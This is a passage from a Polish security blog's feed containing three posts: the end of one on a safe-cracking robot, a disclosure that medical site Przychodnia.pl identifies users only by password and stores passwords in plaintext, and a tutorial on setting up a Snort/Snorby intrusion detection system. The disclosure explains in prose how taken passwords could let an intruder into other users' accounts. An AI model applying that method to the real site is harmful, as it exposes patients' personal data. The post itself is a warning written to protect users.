Milion kombinacji to w tym przypadku jedynie teoria. Otóż ze względu na pewne mechaniczne ograniczenia samego zamka okazało się, że rzeczywisty zakres dozwolonych kombinacji można zredukować około dziesięciokrotnie! Dzięki odpowiedniej optymalizacji programu sterującego pracą robota, udało się ostatecznie zbudować prototyp zdolny do otwarcia sejfu w ciągu zaledwie kilku godzin. Całość jest sterowana za pomocą komputera poprzez port USB, natomiast oprogramowanie (2 tys. linii kodu) sterownika powstało w języku C.&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Powyższy sprzętowy &lt;i&gt;bruteforcer&lt;/i&gt; stanowi więc fascynujący przykład myśli hakerskiej. Warto podkreślić nie tylko interesujące rozwiązanie sprzętowe, lecz również zręczne wykorzystanie fizycznych ograniczeń zamka. Aż szkoda, że najnowsze sejfy wykorzystują obecnie &lt;a href=&quot;http://www.kabamas.com/a.php?page=x-09_main&quot;&gt;zamki elektroniczne&lt;/a&gt;, pozbawione już oczywiście tego typu mechanicznych ułomności. Jeśli znacie podobne niecodzienne implementacje ataków znanych na co dzień ze świata IT, oczywiście zachęcam do dyskusji na ich temat!&lt;br /&gt;
&lt;br /&gt;
[&lt;a href=&quot;http://www.kvogt.com/autodialer/&quot;&gt;źródło&lt;/a&gt;]&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hcseclab.blogspot.com/feeds/769448750438161194/comments/default' title='Komentarze do posta'/><link rel='replies' type='text/html' href='http://hcseclab.blogspot.com/2011/01/jak-z-pomoca-robota-zhakowac-sejf.html#comment-form' title='Komentarze (0)'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4511012464226103155/posts/default/769448750438161194'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4511012464226103155/posts/default/769448750438161194'/><link rel='alternate' type='text/html' href='http://hcseclab.blogspot.com/2011/01/jak-z-pomoca-robota-zhakowac-sejf.html' title='Jak z pomocą robota zhakować sejf?'/><author><name>\m/ojtek</name><uri>http://www.blogger.com/profile/00686678747901186941</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3kPKADUZjOVHLatr652Rn3sSYbK4nJahwcOl4VKk7SqP2zGIxUqZnxpvl45cvn_NGlAw7lyEV4CDIE58SyCxwGnRy1rEZNCjgKWu5NO0BCnsw-9s3cNevdmM3puj1RJ4/s220/P1010377.JPG'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_GcsHBiJbYkCJU3133lcuWFtP1wnmW07UT-li44dtetJb7yzZ08zEZ7mlB_lU493O6mQGr1S0Vu_pfRQG-Eu4myxzrIMkxdhFD29sfQQRyD02JLk1wJk4xdVi2r8j4EMdZyS3eNM38VQ/s72-c/safe.png" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4511012464226103155.post-663699227437955558</id><published>2011-01-16T14:19:00.005+01:00</published><updated>2011-01-17T09:56:38.206+01:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Bezpieczeństwo aplikacji"/><category scheme="http://www.blogger.com/atom/ns#" term="Bezpieczeństwo danych"/><category scheme="http://www.blogger.com/atom/ns#" term="Obrona - Atak"/><category scheme="http://www.blogger.com/atom/ns#" term="Wywiad informatyczny"/><category scheme="http://www.blogger.com/atom/ns#" term="Zachowanie anonimowości"/><category scheme="http://www.blogger.com/atom/ns#" term="Zbieranie informacji"/><title type='text'>Jak Przychodnia.pl (nie) dba o bezpieczeństwo użytkowników?</title><content type='html'>&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;a href=&quot;http://www.hcsl.pl/2011/01/jak-przychodniapl-nie-dba-o.html&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 0em; margin-right: 0em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3iX6Gf_hkXi2941BTuRp9j5sWGPyjewGJorzm2ArGuQMBLNxyWNLBLc4rdz2VOAIGdz6g8jzDzlM16dafdNHJ7DzjFdcjYIVd2um20HfxuBFgoa524St8MYrnERlz02IfnBk_uLsPUv8/s1600/Aesculapian.png&quot; /&gt;&lt;/a&gt;Serwis Przychodnia.pl reklamuje się jako &lt;i&gt;Pierwsza Polska Przychodnia Internetowa&lt;/i&gt;, a jego misją jest ponoć &lt;i&gt;wyjście na przeciw&lt;/i&gt; (pisownia oryginalna) potrzebom pacjentów, ułatwienie im odnalezienia podstawowych informacji z zakresu profilaktyki medycznej oraz skrócenie naszej drogi do lekarzy. Serwis ten jest całkiem popularny i m.in. umożliwia każdemu zarejestrowanie własnego użytkownika... a właściwie nie użytkownika, lecz hasła! Spójrzmy pokrótce na to, w jak kuriozalny sposób Przychodnia.pl wystawia swych użytkowników oraz ich dane personalne na realne niebezpieczeństwo.&lt;br /&gt;
&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Jeden z czytelników HCSL (&lt;b&gt;bartek46op&lt;/b&gt;) zwrócił wczoraj moją uwagę na bardzo osobliwe podejście administracji serwisu Przychodnia.pl do tematu bezpieczeństwa własnych użytkowników. Zgodnie z zapewnieniami Bartka, wszelkie informacje na poniższy temat przekazywane przez niego osobom związanym z serwisem pozostały bez jakiejkolwiek odpowiedzi. Spójrzmy więc ku przestrodze, na co narażeni się użytkownicy tej wirtualnej przychodni.&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Spójrzmy przede wszystkim na formularz rejestracji nowego użytkownika w serwisie:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdVOfC14SxnL-rgEGt5dwS3T9TaP-QStRSLJ4_WvQk4MqXZBr1xh3COjCH9w7F9hJYJx349UkdFeT5F_v_EFFAlSvY6t802jFMp7K8xiJSJe7OLhnXkeqOJ3L61emCatno6VptTm_ppKw/s1600/przychodnia01.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;400&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdVOfC14SxnL-rgEGt5dwS3T9TaP-QStRSLJ4_WvQk4MqXZBr1xh3COjCH9w7F9hJYJx349UkdFeT5F_v_EFFAlSvY6t802jFMp7K8xiJSJe7OLhnXkeqOJ3L61emCatno6VptTm_ppKw/s400/przychodnia01.png&quot; width=&quot;376&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
Tylko zarejestrowany użytkownik w pełni skorzysta z wszystkich dobrodziejstw serwisu, musimy się więc zarejestrować. Próżno jednak szukać pola przeznaczonego na określenie własnej nazwy użytkownika. Otóż &lt;b&gt;identyfikować będzie nas jedynie... unikalne hasło&lt;/b&gt;! Spróbujmy się więc zarejestrować z wykorzystaniem jakiegoś &lt;a href=&quot;http://www.hcsl.pl/2010/06/jakie-hasa-najczesciej-stosuja-polscy.html&quot;&gt;popularnego wśród internautów hasła&lt;/a&gt;:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8vlqFtl7VpQskyjIbQnoOArlV7m9cOumETC6vhyPBARkzs336qqD904cN6NNQEabYTW3aMI5Il_-bECZvAiLoTXV7w3a9BDzjkvKzzsh2zJhX3vG_mjbSUjgbR3OPJEkrONlnNg2aKzU/s1600/przychodnia02.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;112&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8vlqFtl7VpQskyjIbQnoOArlV7m9cOumETC6vhyPBARkzs336qqD904cN6NNQEabYTW3aMI5Il_-bECZvAiLoTXV7w3a9BDzjkvKzzsh2zJhX3vG_mjbSUjgbR3OPJEkrONlnNg2aKzU/s400/przychodnia02.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
Operacja nie udała się, zapewne jednak dlatego, że już ktoś takiego hasła użył. Cóż to oznacza? Potencjalny intruz może się teraz za pomocą tego hasła zalogować do serwisu i w ten sposób uzyska dostęp do wszystkich danych zgromadzonych tam przez pewnego innego użytkownika. Patrząc raz jeszcze na formularz rejestracji, może to być całkiem sporo szczegółowych danych teleadresowych. Warto zauważyć, że nawet poprzez małą pomyłkę we wpisywanym haśle, możemy się przez przypadek zalogować na konto innego użytkownika!&amp;nbsp;To jednak nie koniec potencjalnych problemów mogących wynikać z tego typu ataku.&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Jeśli dany użytkownik stosuje to samo hasło w różnych serwisach i usługach internetowych (a jak wiemy, praktycznie wszyscy mamy przecież do tego mniejsze lub większe skłonności), to intruz dysponujący danymi z formularza rejestracyjnego w Przychodnia.pl (takimi jak imię, nazwisko, miejscowość oraz adres e-mail) bez problemu będzie mógł również uzyskać dostęp do innych kont użytkownika odnalezionych potencjalnie w wielu innych serwisach internetowych. Warto również zauważyć, że sam serwis Przychodnia.pl oferuje również konta poczty e-mail:&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjvy00F0Rul_y-bQlj9BWAO37GdCJ-5bI_GQugYT9HRXXe1-OXPr5fMa4ku5DgaU3SahEVbJQGGRabmz9o_H0QP64_U5Mgalemf1yxbjCC9ZckmC1wqD1Ertd9OssMgNhv9cJoVJe2lB40/s1600/przychodnia03.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;252&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjvy00F0Rul_y-bQlj9BWAO37GdCJ-5bI_GQugYT9HRXXe1-OXPr5fMa4ku5DgaU3SahEVbJQGGRabmz9o_H0QP64_U5Mgalemf1yxbjCC9ZckmC1wqD1Ertd9OssMgNhv9cJoVJe2lB40/s400/przychodnia03.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
Nie wiem jak bardzo usługa ta jest popularna wśród użytkowników wirtualnej przychodni, a może wśród lekarzy chcących mieć adres w domenie przychodnia.pl, możemy sobie jednak łatwo wyobrazić to, jak wygląda bezpieczeństwo poczty elektronicznej w tym serwisie.&lt;br /&gt;
&lt;br /&gt;
Na koniec warto jeszcze tylko zauważyć, że w serwisie znajdują się również inne podatności na &lt;a href=&quot;http://bit.ly/he0B5S&quot;&gt;popularne typy ataków&lt;/a&gt;, a&amp;nbsp;hasła wszystkich użytkowników są w ramach Przychodnia.pl przechowywane w postaci jawnej (niezaszyfrowanej):&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgC8EOIAls07MGHgk__sCnsp6QX0w0WLx47y_QS7smQGsLbjTU0JLv50HBEBi7zY9LRI3ZqHGVhF4RiYP3aM1SSayiE7qcuG6adjKGkY4xPHc1v23Qg3KjHzYOQfalqO8gUiqeC2Au2rrA/s1600/przychodnia04.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;400&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgC8EOIAls07MGHgk__sCnsp6QX0w0WLx47y_QS7smQGsLbjTU0JLv50HBEBi7zY9LRI3ZqHGVhF4RiYP3aM1SSayiE7qcuG6adjKGkY4xPHc1v23Qg3KjHzYOQfalqO8gUiqeC2Au2rrA/s400/przychodnia04.png&quot; width=&quot;287&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
Oczywiście ja również spróbuję się skontaktować w powyższych sprawach z administratorami serwisu, być może tym razem doczekamy się jakiejś odpowiedzi. Na chwilę obecną wszystkich użytkowników serwisu Przychodania.pl zachęcam jednak do rozważenia usunięcia z jego zasobów własnych kont lub upewnienia się, że dane tam zgromadzone nie przydadzą się w żaden sposób potencjalnym intruzom.&lt;br /&gt;
&lt;br /&gt;
&lt;table align=&quot;center&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;tr-caption-container&quot; style=&quot;margin-left: auto; margin-right: auto; text-align: center;&quot;&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style=&quot;text-align: center;&quot;&gt;&lt;a href=&quot;http://www.blogroku.pl/hcsl,gwh7s,blog.html&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: auto; margin-right: auto;&quot; target=&quot;_blank&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://www.blogroku.pl/_d/2010_obrazki/kategoria_51/3_obrazek51.gif&quot; /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class=&quot;tr-caption&quot; style=&quot;text-align: center;&quot;&gt;Przypominam, że nadal możecie głosować na HCSL!&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;br /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hcseclab.blogspot.com/feeds/663699227437955558/comments/default' title='Komentarze do posta'/><link rel='replies' type='text/html' href='http://hcseclab.blogspot.com/2011/01/jak-przychodniapl-nie-dba-o.html#comment-form' title='Komentarze (0)'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4511012464226103155/posts/default/663699227437955558'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4511012464226103155/posts/default/663699227437955558'/><link rel='alternate' type='text/html' href='http://hcseclab.blogspot.com/2011/01/jak-przychodniapl-nie-dba-o.html' title='Jak Przychodnia.pl (nie) dba o bezpieczeństwo użytkowników?'/><author><name>\m/ojtek</name><uri>http://www.blogger.com/profile/00686678747901186941</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3kPKADUZjOVHLatr652Rn3sSYbK4nJahwcOl4VKk7SqP2zGIxUqZnxpvl45cvn_NGlAw7lyEV4CDIE58SyCxwGnRy1rEZNCjgKWu5NO0BCnsw-9s3cNevdmM3puj1RJ4/s220/P1010377.JPG'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3iX6Gf_hkXi2941BTuRp9j5sWGPyjewGJorzm2ArGuQMBLNxyWNLBLc4rdz2VOAIGdz6g8jzDzlM16dafdNHJ7DzjFdcjYIVd2um20HfxuBFgoa524St8MYrnERlz02IfnBk_uLsPUv8/s72-c/Aesculapian.png" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4511012464226103155.post-1326998764398580704</id><published>2011-01-15T17:28:00.009+01:00</published><updated>2011-01-22T12:10:31.274+01:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Bezpieczeństwo sieci komputerowych"/><category scheme="http://www.blogger.com/atom/ns#" term="Linux - Unix"/><category scheme="http://www.blogger.com/atom/ns#" term="Narzędzia"/><category scheme="http://www.blogger.com/atom/ns#" term="Newsy"/><category scheme="http://www.blogger.com/atom/ns#" term="Obrona - Atak"/><category scheme="http://www.blogger.com/atom/ns#" term="Sieci komputerowe"/><title type='text'>Jak w ciągu 5 minut uruchomić profesjonalny system IDS?</title><content type='html'>&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;a href=&quot;http://www.hcsl.pl/2011/01/jak-w-ciagu-5-minut-uruchomic.html&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 0em; margin-right: 0em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgKOrGNGkqe1oRRG3WPZbzSkhY0cYrcvAgWxVpiuE-hRYw-TerdU2wo5hqw8CZ_OT_IH7RU6ADhO5Fb605vl2wU7VfjiIS6lU_hzwQaSMUSoJHjvA_GxEYFwmgrb2-USTQtoNDhQfRqDSU/s1600/snorby.png&quot; /&gt;&lt;/a&gt;Sieciowe systemy wykrywania włamań, czyli systemy typu NIDS (ang. &lt;i&gt;Network-based Intrusion Detection System&lt;/i&gt;) stanowią obecnie jeden z podstawowych mechanizmów obrony sieci i systemów komputerowych przed rozmaitymi atakami sieciowymi. Dziś chciałbym więc pokazać wam, w jak prosty i szybki sposób praktycznie każdy może skonfigurować i uruchomić &amp;nbsp;własny tego typu system, i to w oparciu o zupełnie darmowe i w pełni otwarte oprogramowanie!&lt;br /&gt;
&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Na początek warto sobie przypomnieć to, czym tak naprawdę są systemy typu NIDS. Otóż stanowią one jeden z podstawowych mechanizmów ochrony sieci i systemów komputerowych, pozwalający na wykrywanie ataków w czasie rzeczywistym, np. poprzez analizę ruchu sieciowego w oparciu o pewne uprzednio zdefiniowane sygnatury, lub też statystyczne wykrywanie nietypowych zdarzeń (anomalii) komunikacyjnych.&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Samo wykrywanie odbywa się więc na podstawie analizy przychodzących pakietów sieciowych i porównywania ich zawartości ze znanymi sygnaturami ataków. Rozwijane są również inne metody wykrywania, gdyż porównywanie ze wzorcami ma niezaprzeczalną wadę – dany atak może zostać wykryty tylko i wyłącznie, jeśli jego sygnatura została już umieszczona w bazie danego systemu NIDS. Dość popularne są również metody oparte o wykrywanie anomalii, które w przeciwieństwie do podejścia sygnaturowego, dają pewną nadzieję na wykrycie nieznanych do tej pory rodzajów ataków.&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Tego typu systemem jest bardzo popularny i w pełni otwarty Snort, i to właśnie na jego podstawie zbudujemy nasz przykładowy sensor. Jednak do tej pory uruchomienie w pełni funkcjonalnego snortowego sensora wyposażonego jednocześnie w przyjazny webowy front-end (pozwalający na łatwą analizę alertów i podstawowe zarządzanie całym systemem) wymagało trochę zachodu i mogło stanowić spore wyzwanie dla początkujących. Wszystko to jednak zmienił Snorby.&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;a href=&quot;http://www.snorby.org/&quot;&gt;Snorby&lt;/a&gt; to nowy otwarty, bardzo przyjazny i nowoczesny webowy front-end stworzony właśnie z myślą o Snorcie. Co jednak najciekawsze z punktu widzenia możliwości szybkiego uruchomienia profesjonalnego sensora IDS, w ramach całego projektu dostępny jest również &lt;a href=&quot;http://www.snorby.org/Insta-Snorby-0.5.iso&quot;&gt;obraz systemu typu Live CD&lt;/a&gt;, pozwalający praktycznie każdemu na natychmiastowe rozpoczęcie przygody z wykrywaniem włamań. Spójrzmy pokrótce na możliwości tego interesującego rozwiązania.&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Otóż wystarczy tylko &lt;a href=&quot;http://www.snorby.org/Insta-Snorby-0.6.0.iso&quot;&gt;pobrać obraz systemu Insta-Snorby-0.6.iso&lt;/a&gt; i uruchomić z niego jakiś komputer fizyczny lub maszynę wirtualną. Do wyboru będziemy mieć instalację na dysku lub też tryb Live CD (świetnie nadaje się do testów, ale oczywiście nie do codziennej pracy w roli rzeczywistego systemu IDS). Po przejściu kilku kroków interaktywnej konfiguracji (warto zauważyć, że możliwe jest skonfigurowanie automatycznego pobierania nowych reguł) wszystko jest już gotowe do pracy. Nasz sensor jest już zdolny do wykrywania incydentów w ramach widocznego mu ruchu sieciowego, a my możemy się już połączyć z samym interfejsem Snorby za pomocą naszej przeglądarki:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi5rLUhjs6QBFtRm1fN2ZbodZS2PwfTJxmPqTNZkYjamYNAU05mHm0F1W3MjjGPcdmJAMqnwcGd4DHnM1KeGXMWx28Olsnh-f7GI6OiCEUW8ogOnhfpEHZA5Jp6_y6b3T2eqZC7fpD8f9k/s1600/snorby01.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;222&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi5rLUhjs6QBFtRm1fN2ZbodZS2PwfTJxmPqTNZkYjamYNAU05mHm0F1W3MjjGPcdmJAMqnwcGd4DHnM1KeGXMWx28Olsnh-f7GI6OiCEUW8ogOnhfpEHZA5Jp6_y6b3T2eqZC7fpD8f9k/s400/snorby01.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
Pora na mały test skuteczności wykrywania incydentów oraz sprawdzian możliwości oferowanych przez nowy webowy front-end. W celu zgromadzenia znacznej ilości przykładowych danych, z pomocą narzędzi zgromadzonych w ramach systemu &lt;a href=&quot;http://www.hcsl.pl/2010/11/backtrack-4-r2-nemesis-czyli-dazenia-do.html&quot;&gt;BackTrack 4 R2&lt;/a&gt; odpaliłem w kierunku kilku wirtualnych maszyn testowych tysiące rozmaitych ataków i exploitów, a cały ruch sieciowy był w zasięgu wzroku testowanego systemu IDS. Najwyraźniej nasz sensor rzeczywiście działa, a webowy interfejs od razu zachęca nas do analizy zarejestrowanych zdarzeń:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPNi3KCr4vvsJ-iNJdfV9-P_HMHaChONDZrlJkSsdl674nS1imaIXrOZkBnW8M5myqf0dhyphenhyphen-myVAWbsspmkHJAmcjr6q5T_RJjOaXdwOlDsdZk1KbfwkOTlHqfIO9BwjOsHRsPzp5Ectg/s1600/snorby02.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;248&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPNi3KCr4vvsJ-iNJdfV9-P_HMHaChONDZrlJkSsdl674nS1imaIXrOZkBnW8M5myqf0dhyphenhyphen-myVAWbsspmkHJAmcjr6q5T_RJjOaXdwOlDsdZk1KbfwkOTlHqfIO9BwjOsHRsPzp5Ectg/s400/snorby02.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
Oczywiście każde ze zdarzeń możemy dokładnie przeanalizować, włącznie z wyświetleniem zawartości złowrogich pakietów:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9lAJV_KieU7-CdqDSxGWb1U90jt1tdclJZS6XhfKC6XWAMjayoDCTg9nGP_8IfLeM5SvUTXuH9DZwY8hb9cltDsiuIw5Kkz3uiV_1VPnEVs7pFTewO70bb9aLhIBEcXj5IsXBWuM29js/s1600/snorby03.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;248&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9lAJV_KieU7-CdqDSxGWb1U90jt1tdclJZS6XhfKC6XWAMjayoDCTg9nGP_8IfLeM5SvUTXuH9DZwY8hb9cltDsiuIw5Kkz3uiV_1VPnEVs7pFTewO70bb9aLhIBEcXj5IsXBWuM29js/s400/snorby03.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
Do swej dyspozycji mamy również najrozmaitsze podsumowania zarejestrowanych zdarzeń:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvOIgL5ws0zzZ9f8OuCn4uy_G9YSuQbh-M17rkDxdjz-jE3F-A7DkT-i9SYlzrBrhg6yJD7gDvyeJamR0Os00GJ-JAE4sSbO9Z04H4QBWMr7weSZh1HXX79vxts_yHEZSUD4ohWU_oiwk/s1600/snorby04.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;248&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvOIgL5ws0zzZ9f8OuCn4uy_G9YSuQbh-M17rkDxdjz-jE3F-A7DkT-i9SYlzrBrhg6yJD7gDvyeJamR0Os00GJ-JAE4sSbO9Z04H4QBWMr7weSZh1HXX79vxts_yHEZSUD4ohWU_oiwk/s400/snorby04.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
Spójrzmy jeszcze na krótką filmową prezentację możliwości całego interfejsu:&lt;br /&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;iframe frameborder=&quot;0&quot; height=&quot;375&quot; src=&quot;http://player.vimeo.com/video/16597187?title=0&amp;amp;byline=0&amp;amp;portrait=0&quot; width=&quot;600&quot;&gt;&lt;/iframe&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Podsumowując, Snorby pozwala nam na niezwykle szybkie i bardzo proste uruchomienie w pełni funkcjonalnego sensora IDS Snort, i to wyposażonego w webowy front-end o naprawdę sporych możliwościach oraz intuicyjnej obsłudze. Moim zdaniem możliwości tego rozwiązania są większe od wielu systemów komercyjnych oraz od innych popularnych interfejsów stosowanych wraz ze Snortem (takich jak &lt;a href=&quot;http://base.secureideas.net/&quot;&gt;BASE&lt;/a&gt;). Wreszcie, dzięki Snorby Live CD, praktycznie każdy może teraz w ciągu kilku minut uruchomić swój własny sensor Snort i bez najmniejszego problemu rozpocząć zabawę z wykrywaniem włamań.&lt;br /&gt;
&lt;br /&gt;
Jak zwykle, czekam również oczywiście na wasze opinie i spostrzeżenia dotyczące tego interesującego projektu! Poza tym, warto pamiętać, że nadal możecie &lt;a href=&quot;http://www.hcsl.pl/2011/01/hard-core-security-lab-blogiem-roku.html&quot;&gt;oddawać swoje głosy na HCSL w ramach konkursu Blog Roku 2010&lt;/a&gt;.&lt;br /&gt;
&lt;br /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hcseclab.blogspot.com/feeds/1326998764398580704/comments/default' title='Komentarze do posta'/><link rel='replies' type='text/html' href='http://hcseclab.blogspot.com/2011/01/jak-w-ciagu-5-minut-uruchomic.html#comment-form' title='Komentarze (0)'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4511012464226103155/posts/default/1326998764398580704'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4511012464226103155/posts/default/1326998764398580704'/><link rel='alternate' type='text/html' href='http://hcseclab.blogspot.com/2011/01/jak-w-ciagu-5-minut-uruchomic.html' title='Jak w ciągu 5 minut uruchomić profesjonalny system IDS?'/><author><name>\m/ojtek</name><uri>http://www.blogger.com/profile/00686678747901186941</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3kPKADUZjOVHLatr652Rn3sSYbK4nJahwcOl4VKk7SqP2zGIxUqZnxpvl45cvn_NGlAw7lyEV4CDIE58SyCxwGnRy1rEZNCjgKWu5NO0BCnsw-9s3cNevdmM3puj1RJ4/s220/P1010377.JPG'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgKOrGNGkqe1oRRG3WPZbzSkhY0cYrcvAgWxVpiuE-hRYw-TerdU2wo5hqw8CZ_OT_IH7RU6ADhO5Fb605vl2wU7VfjiIS6lU_hzwQaSMUSoJHjvA_GxEYFwmgrb2-USTQtoNDhQfRqDSU/s72-c/snorby.png" height="72" 